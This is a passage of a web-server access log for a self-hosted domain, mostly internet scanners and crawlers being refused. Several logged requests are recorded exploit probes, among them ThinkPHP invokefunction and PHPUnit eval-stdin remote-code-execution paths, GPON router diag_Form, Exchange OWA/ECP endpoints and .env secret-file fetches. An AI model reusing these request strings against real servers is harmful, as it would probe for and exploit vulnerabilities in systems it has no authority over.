Chrome/81.0.4044.129 Safari/537.36" "-" [08/Oct/2021:00:34:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.149.192.22] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" "-" [08/Oct/2021:00:37:41 +0000] 444 - GET https www.jackett.moralanimal.net "/" [Client 85.215.2.227] [Length 0] [Gzip -] "Server-Daten Check your Website (https://check-your-website.server-daten.de/)" "-" [08/Oct/2021:00:37:42 +0000] 444 - GET https www.jackett.moralanimal.net "/" [Client 85.215.2.227] [Length 0] [Gzip -] "Server-Daten Check your Website (https://check-your-website.server-daten.de/)" "-" [08/Oct/2021:00:38:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 85.215.2.227] [Length 0] [Gzip -] "Server-Daten Check your Website (https://check-your-website.server-daten.de/)" "-" [08/Oct/2021:00:38:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 85.215.2.227] [Length 0] [Gzip -] "Server-Daten Check your Website (https://check-your-website.server-daten.de/)" "-" [08/Oct/2021:01:34:22 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 134.209.91.118] [Length 0] [Gzip -] "curl/7.3.2" "-" [08/Oct/2021:01:43:57 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:01:43:57 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:01:54:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [08/Oct/2021:02:02:52 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [08/Oct/2021:02:02:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [08/Oct/2021:02:02:52 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211008100138" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [08/Oct/2021:03:13:04 +0000] 400 - GET https localhost "/" [Client 5.8.10.202] [Length 154] [Gzip -] "-" "-" [08/Oct/2021:04:00:00 +0000] 400 - GET https localhost "/" [Client 5.8.10.202] [Length 154] [Gzip -] "-" "-" [08/Oct/2021:04:06:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.57] [Length 0] [Gzip -] "-" "-" [08/Oct/2021:04:06:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "-" "-" [08/Oct/2021:04:06:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [08/Oct/2021:04:26:10 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:10 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:11 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:12 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:13 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:15 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [08/Oct/2021:04:26:16 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:20 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:20 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:25 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Oct/2021:04:26:28 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [08/Oct/2021:04:53:24 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Oct/2021:04:57:51 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Oct/2021:05:41:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [08/Oct/2021:06:25:05 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.201.43] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Oct/2021:06:25:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 117.50.7.159] [Length 0] [Gzip -] "-" "-" [08/Oct/2021:06:25:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.85.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [08/Oct/2021:06:26:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 117.50.110.69] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [08/Oct/2021:06:27:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 117.50.110.69] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [08/Oct/2021:06:33:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.196] [Length 0] [Gzip -] "-" "-" [08/Oct/2021:06:33:04 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.196] [Length 252] [Gzip -] "-" "-" [08/Oct/2021:06:33:04 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.196] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [08/Oct/2021:07:05:49 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 34.96.130.27] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [08/Oct/2021:08:59:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 209.141.41.193] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [08/Oct/2021:08:59:16 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 205.185.122.184] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [08/Oct/2021:10:01:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.206.57] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Oct/2021:11:16:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [08/Oct/2021:11:16:01 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [08/Oct/2021:12:11:15 +0000] 400 - - http localhost "-" [Client 94.102.56.229] [Length 154] [Gzip -] "-" "-" [08/Oct/2021:12:26:35 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 161.35.148.161] [Length 0] [Gzip -] "curl/7.3.2" "-" [08/Oct/2021:12:43:35 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [08/Oct/2021:14:29:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.17] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [08/Oct/2021:14:48:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [08/Oct/2021:15:35:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.53.170.243] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Oct/2021:16:11:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Oct/2021:16:34:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [08/Oct/2021:16:42:42 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Oct/2021:17:02:51 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Oct/2021:17:02:51 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Oct/2021:17:02:51 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Oct/2021:17:02:51 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Oct/2021:17:02:51 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Oct/2021:17:02:51 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Oct/2021:17:14:32 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.86.35.22] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [08/Oct/2021:17:52:58 +0000] 400 - - http localhost "-" [Client 176.58.124.134] [Length 154] [Gzip -] "-" "-" [08/Oct/2021:19:15:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 170.130.187.42] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [08/Oct/2021:19:52:22 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:19:52:22 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:20:02:29 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:20:02:29 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:20:10:32 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:20:10:32 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:22:08:35 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [08/Oct/2021:22:30:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.9.119.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Oct/2021:22:49:24 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:22:49:25 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:23:17:38 +0000] 444 - POST https 64.22.31.253 "/OWA/NSPI/" [Client 108.178.41.202] [Length 0] [Gzip -] "-" "-" [08/Oct/2021:23:31:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Oct/2021:23:47:46 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:23:47:47 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Oct/2021:23:50:54 +0000] 444 - GET https pop.moralanimal.net "/" [Client 34.96.130.5] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [09/Oct/2021:00:08:46 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.203.213] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Oct/2021:00:34:11 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Oct/2021:00:34:11 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Oct/2021:00:50:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.132] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [09/Oct/2021:00:50:21 +0000] 400 - - https localhost "-" [Client 23.129.64.199] [Length 154] [Gzip -] "-" "-" [09/Oct/2021:00:50:22 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 209.127.17.242] [Length 0] [Gzip -] "-" "-" [09/Oct/2021:00:50:24 +0000] 444 - OPTIONS https localhost "/" [Client 209.127.17.242] [Length 0] [Gzip -] "-" "-" [09/Oct/2021:00:50:28 +0000] 400 - - https localhost "-" [Client 209.127.17.242] [Length 154] [Gzip -] "-" "-" [09/Oct/2021:01:01:43 +0000] 400 - - http localhost "-" [Client 125.64.94.138] [Length 154] [Gzip -] "-" "-" [09/Oct/2021:02:41:39 +0000] 444 - GET https agent.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [09/Oct/2021:03:22:04 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Oct/2021:03:22:04 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Oct/2021:03:48:19 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 34.86.35.4] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [09/Oct/2021:04:24:50 +0000] 444 - GET https shop.moralanimal.net "/" [Client 124.126.78.175] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0; HUAWEI P20 Build/23112) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4472.114 Mobile Safari/537.36 Edg/86" "-" [09/Oct/2021:04:54:02 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Oct/2021:04:55:00 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.198.125] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Oct/2021:04:57:31 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Oct/2021:05:05:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.152] [Length 0] [Gzip -] "-" "-" [09/Oct/2021:05:11:59 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 161.35.148.161] [Length 0] [Gzip -] "curl/7.3.2" "-" [09/Oct/2021:05:27:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Oct/2021:06:07:26 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [09/Oct/2021:06:10:38 +0000] 444 - GET https komga.moralanimal.net "/" [Client 61.135.15.180] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [09/Oct/2021:06:17:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.91.204.232] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/55.0.3034.57 Safari/537.32" "-" [09/Oct/2021:06:17:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.91.204.232] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/55.0.3034.57 Safari/537.32" "-" [09/Oct/2021:06:48:29 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.208.203] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Oct/2021:07:54:33 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 134.209.87.177] [Length 0] [Gzip -] "curl/7.3.2" "-" [09/Oct/2021:10:02:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.209.152] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Oct/2021:10:50:22 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [09/Oct/2021:12:50:26 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.198.101] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Oct/2021:13:24:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.44] [Length 0] [Gzip -] "-" "-" [09/Oct/2021:13:24:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "-" "-" [09/Oct/2021:13:24:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [09/Oct/2021:15:04:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [09/Oct/2021:15:29:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [09/Oct/2021:15:29:35 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211009232818" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [09/Oct/2021:15:55:14 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [09/Oct/2021:16:14:14 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [09/Oct/2021:16:14:14 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [09/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Oct/2021:18:39:04 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [09/Oct/2021:19:57:19 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:20 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Oct/2021:19:57:20 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip 